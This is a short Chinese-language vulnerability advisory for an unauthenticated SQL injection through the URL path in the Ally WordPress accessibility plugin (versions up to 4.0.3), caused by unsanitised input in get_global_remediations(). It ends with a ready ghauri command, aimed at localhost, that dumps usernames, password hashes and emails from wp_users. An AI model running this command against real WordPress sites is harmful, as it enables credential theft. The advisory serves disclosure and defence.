Ally – Web Accessibility & Usability <= 4.0.3 - 通过 URL 路径的未认证 SQL 注入
Ally – Web Accessibility & Usability WordPress 插件在 4.0.3 及之前的所有版本中,存在通过 URL 路径触发的 SQL 注入漏洞。原因是 get_global_remediations() 方法对用户提供的 URL 参数转义不足,该参数未经正确的 SQL 上下文净化,直接拼接进 SQL JOIN 子句。虽然使用了 esc_url_raw() 来保证 URL 安全,但它无法阻止 SQL 元字符(单引号、括号)被注入。这使得未认证攻击者能够将额外的 SQL 查询附加到现有查询中,进而利用时间型盲注技术从数据库中提取敏感信息。利用此漏洞需要启用 Remediation 模块,而这要求插件已连接至 Elementor 账户。
ghauri -u "http://localhost:9001/x*" --technique=E --dbms=mysql --batch --ignore-code 404 --skip-urlencode --prefix="'" --suffix="OR'" -D wordpress -T wp_users -C user_login,user_pass,user_email --dump